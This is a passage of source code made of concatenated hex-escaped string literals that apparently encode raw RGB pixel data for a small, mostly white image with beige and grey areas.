+"\xfa\xf8\xf4\xeb\xdf\xf2\xe9\xdb\xf7\xf1\xe9\xf9\xf6\xf0\xfe\xfd"
+"\xfd\xfd\xfc\xfb\xf7\xf1\xe8\xec\xdb\xc4\xe2\xc9\xa6\xf1\xe6\xd6"
+"\xfe\xfe\xfe\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xfb\xf9\xf5\xeb\xda\xc2\xe0\xc5\xa0\xfd\xfc"
+"\xfa\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xcf\xb1\xfd\xfb\xf9\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf4\xea\xdd"
+"\xe4\xcc\xab\xe3\xcb\xa9\xfd\xfc\xfa\xfe\xfe\xfe\xff\xff\xff\xfe"
+"\xfe\xfe\xfc\xfb\xf8\xf5\xed\xe1\xe2\xc8\xa4\xe3\xcb\xa9\xed\xde"
+"\xc9\xfd\xfc\xfb\xfe\xfe\xfe\xfe\xfe\xfe\xfb\xf9\xf6\xfe\xfe\xfe"
+"\xf7\xf1\xe9\xf9\xf4\xed\xfa\xf6\xf0\xf8\xf3\xec\xfe\xfe\xfe\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xfe\xfd\xfd\xfd\xfb\xfa\xf3\xeb\xde\xf3\xea\xdd\xfa\xf7"
+"\xf3\xfa\xf7\xf2\xfe\xfe\xfd\xfe\xfd\xfd\xef\xe2\xcf\xdb\xbc\x92"
+"\xd3\xab\x74\xf4\xea\xde\xfc\xfa\xf7\xfe\xfe\xfe\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xfd\xfb\xf9\xee\xdf\xcb\xed\xde"
+"\xc9\xfc\xfa\xf8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xcf\xb1\xfd\xfb\xf9\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfa\xf6\xf0\xe1\xc6\xa2"
+"\xea\xd8\xbf\xf9\xf5\xee\xff\xff\xff\xff\xff\xff\xfe\xfe\xfd\xf1"
+"\xe5\xd5\xe6\xd0\xb2\xe1\xc7\xa3\xf1\xe5\xd6\xfb\xf7\xf3\xfe\xfe"
+"\xfd\xfe\xfd\xfc\xfb\xf9\xf5\xfc\xfa\xf8\xf0\xe4\xd4\xf8\xf2\xeb"
+"\xfc\xfa\xf7\xfd\xfc\xfa\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfd\xfc\xfd\xfb\xf9\xfb\xf9"
+"\xf6\xf2\xe9\xdd\xfa\xf7\xf3\xf8\xf2\xeb\xfe\xfe\xfd\xff\xff\xff"
+"\xfb\xf7\xf2\xe1\xc7\xa3\xe5\xce\xaf\xf0\xe3\xd2\xfe\xfe\xfd\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfd\xfc\xfb\xe1\xc7"
+"\xa3\xeb\xd9\xc1\xfc\xf9\xf6\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xcf\xb1\xfd\xfb\xf9\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xfd\xfc\xfb\xf4\xea\xdd\xe4\xcc\xab\xf2\xe8\xda"
+"\xfd\xfc\xfa\xfe\xfe\xfe\xfd\xfc\xfb\xf8\xf2\xeb\xed\xde\xc8\xe2"
+"\xc8\xa6\xea\xd7\xbe\xf5\xed\xe2\xfe\xfe\xfe\xfd\xfc\xfb\xfa\xf7"
+"\xf3\xf7\xf2\xea\xf1\xe5\xd6\xf8\xf4\xee\xf9\xf5\xf0\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfc\xfb\xfb\xf8\xf4\xe9\xd8\xc1"
+"\xec\xdd\xc8\xf9\xf4\xee\xfb\xf9\xf5\xf9\xf3\xed\xe4\xcc\xaa\xe1"
+"\xc8\xa5\xe9\xd7\xbd\xfc\xfb\xf8\xfe\xfe\xfe\xff\xff\xff\xfe\xfe"
+"\xfe\xf8\xf1\xe8\xe4\xcc\xac\xf7\xf0\xe7\xfe\xfe\xfe\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xd0\xb2\xfd\xfb\xf9\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfc"
+"\xfb\xf3\xea\xdc\xe3\xcb\xa9\xf2\xe8\xda\xfd\xfc\xfa\xfa\xf6\xf1"
+"\xf0\xe3\xd2\xe5\xce\xaf\xe7\xd1\xb5\xf3\xe8\xd9\xfc\xf9\xf6\xf9"
+"\xf5\xf0\xfa\xf8\xf4\xf7\xf2\xeb\xf7\xf2\xeb\xfb\xf9\xf6\xfa\xf7"
+"\xf3\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xff\xff\xff"
+"\xff\xff\xff\xf1\xe7\xd8\xf4\xed\xe2\xfb\xf8\xf5\xf9\xf4\xee\xf2"
+"\xe6\xd7\xe6\xd1\xb3\xe6\xd0\xb2\xf1\xe6\xd6\xfb\xf8\xf3\xff\xff"
+"\xff\xff\xff\xff\xf9\xf5\xef\xe3\xc9\xa6\xf4\xeb\xdf\xfe\xfd\xfd"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xd1\xb3\xfd\xfc\xfa\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xf6\xf0\xeb\xda"
+"\xc2\xe1\xc6\xa1\xf9\xf4\xee\xfd\xfc\xfa\xf7\xf1\xe8\xe3\xca\xa8"
+"\xe2\xc8\xa5\xea\xd8\xc0\xfb\xf9\xf6\xf9\xf4\xee\xfa\xf7\xf3\xef"
+"\xe4\xd3\xf7\xf2\xea\xfb\xf9\xf7\xfe\xfd\xfc\xfe\xfe\xfe\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xfc\xfb\xf8\xfc\xfa\xf7\xf9\xf6\xf1\xf5\xee\xe4\xfb"
+"\xf9\xf5\xf7\xf2\xea\xe9\xd6\xbc\xe2\xc8\xa4\xe4\xcc\xaa\xf9\xf4"
+"\xed\xfe\xfd\xfc\xfe\xfe\xfe\xea\xd8\xbe\xe1\xc7\xa2\xf2\xe6\xd7"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xd1\xb3\xfd\xfc\xfa\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe3\xcb\xab\xe3\xcb"
+"\xa9\xf2\xe7\xd9\xf3\xe9\xdc\xe8\xd4\xb9\xe1\xc7\xa4\xef\xe1\xce"
+"\xf7\xf1\xe9\xf8\xf3\xec\xf8\xf3\xed\xef\xe3\xd3\xf6\xf0\xe8\xfb"
+"\xf9\xf5\xfe\xfd\xfc\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe"
+"\xfe\xfd\xfb\xf9\xf6\xf9\xf5\xef\xf0\xe4\xd4\xf6\xef\xe6\xec\xdc"
+"\xc7\xe4\xcb\xaa\xe0\xc5\xa0\xf3\xe8\xda\xfa\xf6\xf1\xf0\xe3\xd1"
+"\xeb\xda\xc2\xfb\xf9\xf5\xfe\xfe\xfe\xe6\xd1\xb3\xfd\xfc\xfa\xfe"
+"\xfe\xfe\xf2\xe7\xd9\xd7\xb4\x84\xd7\xb4\x83\xea\xd7\xbe\xe2\xc9"
+"\xa6\xe2\xc9\xa6\xf0\xe3\xd2\xf7\xf2\xeb\xf8\xf3\xed\xf7\xf2\xea"
+"\xfd\xfb\xf9\xfc\xfa\xf8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xfe\xfd\xfc\xfb\xf8\xf4\xfb\xf9\xf6\xef\xe3"
+"\xd3\xf6\xef\xe6\xf2\xe7\xd9\xe1\xc6\xa2\xe4\xcd\xae\xee\xe0\xcd"
+"\xe1\xc6\xa2\xe9\xd5\xba\xfa\xf6\xf1\xe6\xd1\xb3\xfc\xfb\xf9\xf9"
+"\xf5\xee\xdc\xbe\x95\xec\xdd\xc8\xe6\xd1\xb4\xe3\xcb\xaa\xe7\xd4"
+"\xb9\xf3\xea\xde\xf2\xe7\xd8\xf8\xf2\xeb\xfd\xfc\xfa\xfe\xfe\xfd"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfa\xf7"
+"\xf3\xfc\xf9\xf6\xf8\xf3\xec\xf0\xe5\xd5\xe9\xd7\xbd\xdf\xc4\x9f"
+"\xe3\xca\xa9\xdd\xc0\x98\xe6\xcf\xb2\xe6\xd1\xb3\xf3\xe9\xdb\xe1"
+"\xc6\xa1\xd8\xb7\x88\xd3\xaa\x73\xe4\xcc\xab\xf6\xf0\xe7\xf1\xe6"
+"\xd7\xf7\xf1\xea\xfd\xfc\xfa\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfc\xfa\xfb\xf9\xf6"
+"\xfc\xfa\xf7\xfb\xf9\xf5\xfd\xfb\xfa\xfd\xfb\xfa\xfd\xfc\xfa\xfd"
+"\xfb\xf9\xf6\xf6\xf5\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xf7\xf7\xf8\xf2\xf2\xf2\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf9\xf9"
+"\xf9\xf2\xf3\xf3\xed\xee\xee\xdb\xdc\xdc\xe3\xe3\xe3\xda\xdb\xdb"
+"\xe5\xe5\xe5\xf0\xf0\xf0\xee\xee\xee\xda\xda\xda\xed\xed\xed\xfc"
+"\xfc\xfc\xd8\xd8\xd8\xf8\xf8\xf8\xec\xec\xed\xe9\xe9\xe9\xde\xde"
+"\xde\xe1\xe1\xe2\xdd\xde\xde\xcf\xd0\xd0\xfa\xfa\xfa\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xed\xed"
+"\xed\xd8\xd9\xda\xd2\xd3\xd4\xb0\xb1\xb2\xb5\xb6\xb6\xd1\xd2\xd2"
+"\xb4\xb4\xb3\xd1\xd1\xd0\xc9\xc9\xc9\xad\xad\xad\xcc\xcd\xcd\xf5"
+"\xf5\xf5\xbf\xbf\xbf\xdf\xdf\xde\x9d\x9d\x9d\xb6\xb7\xb7\xc6\xc7"
+"\xc7\xc6\xc7\xc7\xcc\xcc\xcc\xc9\xc9\xca\xf3\xf3\xf3\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xfa"
+"\xfa\xea\xea\xea\xe9\xe9\xe9\xe5\xe5\xe5\xec\xec\xec\xe0\xe1\xe1"
+"\xdb\xdb\xdb\xe0\xe1\xe0\xe8\xe8\xe8\xe1\xe1\xe1\xf1\xf1\xf1\xfd"
+"\xfd\xfd\xd5\xd5\xd5\xec\xec\xec\xf4\xf4\xf4\xf1\xf1\xf1\xe4\xe4"
+"\xe4\xe7\xe7\xe6\xc8\xc9\xc9\xd7\xd7\xd7\xf9\xf9\xf9\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xf7\xf7\xf7\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe"
+"\xfe\xfe\xf7\xf7\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xf5\xf5\xf5\xf7\xf7\xf7\xfe\xfe\xfe\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
